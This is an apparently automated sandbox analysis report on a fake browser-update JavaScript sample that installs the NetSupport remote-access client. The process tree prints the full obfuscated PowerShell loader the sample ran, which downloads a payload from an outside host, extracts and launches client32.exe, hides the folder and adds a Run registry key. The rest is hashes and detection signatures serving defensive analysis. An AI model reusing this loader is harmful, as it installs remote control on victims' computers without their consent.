Analysis
-
max time kernel
138s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231130-en -
resource tags
arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system -
submitted
13/12/2023, 21:34
Static task
static1
Behavioral task
behavioral1
Sample
Setup/Update_browser_17.645327.js
Resource
win10v2004-20231130-en
Behavioral task
behavioral2
Sample
Setup/Update_browser_17.645328.js
Resource
win10v2004-20231130-en
Behavioral task
behavioral3
Sample
Setup/Update_browser_17.645329.js
Resource
win10v2004-20231130-en
Behavioral task
behavioral4
Sample
Setup/Update_browser_17.645330.js
Resource
win10v2004-20231130-en
Behavioral task
behavioral5
Sample
Update_browser_17.6436.js
Resource
win10v2004-20231130-en
General
-
Target
Setup/Update_browser_17.645329.js
-
Size
297KB
-
MD5
21672be9e05cd64b67a78bf882b9faa2
-
SHA1
9d511b85ee408e1bfc15856f4cd55a83ed748c6b
-
SHA256
89d46c03b8da238b4bca7ad1d0673da49acb5b6bbdadb8f2467ab289c18d6b37
-
SHA512
95d936119230e2523bea6c42f1309d12e2d11f4f1ed6dab816175038ad2d875a973c4d6edef6e08b4c4fb93c13cb8e9e8a95ddd032aef4db8f7ea12b8e0e4f21
-
SSDEEP
3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BC/OpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BZcJ6QhO1T7cZd6Bp
Malware Config
Extracted
https://mindsnatchers.com/GetImageData.php?13604
https://mindsnatchers.com/GetImageData.php?13604
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 4488 wscript.exe 22 4972 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1791582586-1997866593-3795608343-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 4440 client32.exe -
Loads dropped DLL 5 IoCs
pid Process 4440 client32.exe 4440 client32.exe 4440 client32.exe 4440 client32.exe 4440 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1791582586-1997866593-3795608343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVXX = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX-874\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4972 powershell.exe 4972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4972 powershell.exe Token: SeSecurityPrivilege 4440 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4440 client32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4488 wrote to memory of 4972 4488 wscript.exe 88 PID 4488 wrote to memory of 4972 4488 wscript.exe 88 PID 4972 wrote to memory of 4440 4972 powershell.exe 93 PID 4972 wrote to memory of 4440 4972 powershell.exe 93 PID 4972 wrote to memory of 4440 4972 powershell.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Setup\Update_browser_17.645329.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $IFvgNsMDekYgSpCEAyHPB='https://mindsnatchers.com/GetImageData.php?13604';$PTMiFFnlesyyyGDORXmSieuwmHxuUVEWioy=(New-Object System.Net.WebClient).DownloadString($IFvgNsMDekYgSpCEAyHPB);$IyeRwpueefKICbKpQpKHQbldvdhQWGUaYHm=[System.Convert]::FromBase64String($PTMiFFnlesyyyGDORXmSieuwmHxuUVEWioy);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $imISfwcmkVzRrkLMAaqcOtajIwbFNSh=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $imISfwcmkVzRrkLMAaqcOtajIwbFNSh -PathType Container)) { New-Item -Path $imISfwcmkVzRrkLMAaqcOtajIwbFNSh -ItemType Directory };$p=Join-Path $imISfwcmkVzRrkLMAaqcOtajIwbFNSh 'rtr.zip';[System.IO.File]::WriteAllBytes($p,$IyeRwpueefKICbKpQpKHQbldvdhQWGUaYHm);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$imISfwcmkVzRrkLMAaqcOtajIwbFNSh)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $imISfwcmkVzRrkLMAaqcOtajIwbFNSh 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $imISfwcmkVzRrkLMAaqcOtajIwbFNSh -Force; $FSDFSSD.attributes='Hidden';$s=$imISfwcmkVzRrkLMAaqcOtajIwbFNSh+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIVXX';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Roaming\DIVX-874\client32.exe"C:\Users\Admin\AppData\Roaming\DIVX-874\client32.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4440
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
30KB
MD5168a4f93cad3e9685ba3a09d2f79266c
SHA1b64940017ea4e1b41c520378f0ed988541232349
SHA256552f80b9710202d2358fc8b6723ad01f64cbc595db383f0e10c2fbc531a24430
SHA5127875a6bded165a4a0681948111d342c1e643b558c406685a40a12722d0514b260c87e2c52903e31008c5a305c652428daac74ce69e3aee47893d33129d40f749
-
Filesize
46KB
MD5147a28ef072f1018a9f33a93800d9a0c
SHA11f9e74e3c37a4a389416aed89af6b0e89a0e6fe0
SHA25690f5852bef2193fc8b32bc45de5f03cb1524d029deb39d9ab0a62c42417b5ace
SHA512b617e0b30c80b1144a3fa607d62f29caeb6dc977e4d521c707cb5f4ec09bb3311b0bf7e84b8a1c2651f2705f0ec30f810713982e5a15a8ccb4a791c994ddf6da
-
Filesize
46KB
MD51f3dfd1bce9ee245fd950a842ac39759
SHA101bc7f6d1b71a0f8bfe04fe4359cce817e62b5f3
SHA2564e40d978adaade35833f3e9e6da4775cb5b91898c9882dddd32fee2755db33c0
SHA51285d90f0a86876caccb52d11ca32227178405ca8796f7fe0fe5fa2ee2e7b1f374d7fea0c216e485154e2128aae6a14e830609258bcb3d129a7b65d679ea258b49
-
Filesize
258B
MD51b41e64c60ca9dfadeb063cd822ab089
SHA1abfcd51bb120a7eae5bbd9a99624e4abe0c9139d
SHA256f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d
SHA512c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4
-
Filesize
18KB
MD5104b30fef04433a2d2fd1d5f99f179fe
SHA1ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA5125efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f
-
Filesize
50KB
MD5745958b652686377187b5b096d7689ab
SHA181c31fa4e905461ede79af739dbfae222c469ad3
SHA256fc089fa105ef88f9091653c6481eefc18e653e96ff8e2ee271cd2a7f23fe3d52
SHA51233cd9c0dbd5dbd8f9153e8c5a7a8f77f04953e6364944a13feb6a2d243466e25bf063b7643cf34620f505e61b7f44bcc47512755aad926c7103f500ac53bf84e
-
Filesize
93KB
MD5c9edb2e0e50b1fe9a9811a779f2b6ab9
SHA1d2ecb8ebd9b139bd6834aaeac3bdded782a5619e
SHA256cbb5ead90ee30696ad465c083b8752bf1b1851a183eb22f9b13fc193402859f1
SHA51212bdb8393d7d1572c00b257483035850e11bb8cd395ad4cf5e41c8c5da553d6e6df3ac03432c3b3e1330c0cb9aaf8704f96e84ca4e717a235d41deccb422e728
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
78KB
MD5e6b173d46377150d48160910912104d8
SHA12adadce9c003e2067cadb15cdea3a6fdcad56fd9
SHA2566d83cc7f8ebee2f89862fd5e23d8cc40f6e0503339466e6800e2a65023c2054d
SHA512a99261125be35b3cfa5a2c562741a63de70c961e2e244166861b29271422b5613cdad60f32d11cedab054c55e71f3184f982bc7a95b33655f483f0c1f6b50c79
-
Filesize
670B
MD5b11f62b15f97cf5afb117e967c223882
SHA1d6cc3f4c7cad5bf28d9c44bee2362b8edc69097b
SHA25613fe71354608a9345d9d7c1600568ec911d718ece989442a39a5601e5fe35586
SHA51285dbba7dcb1aa1015c186567b06ca2ae5a782a21b0b4008496fb831b39f27e5ee79c716e46aa07a9392fd3037aa1e7b4dbb47f217b1f0eb1c7fc9516d775cc7a
-
Filesize
108KB
MD53449fb3dacdb08e0b5d3e1a2d03c336b
SHA1ef0649674923f35f3838bed24b1f396a67167843
SHA256573a09db73777d70a1638e4789e122e620fbfad9f25db3661e15696f8c04e067
SHA512529e42d74149ac07d9698a12b9d791f09746e3aeb31025a4ecdf2dda39d28897c310e5cd26a4a5d9d48ddc54344f5c51bdba63f286bf87087946f94acd5bbe6b
-
Filesize
32KB
MD534dfb87e4200d852d1fb45dc48f93cfc
SHA135b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA2562d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2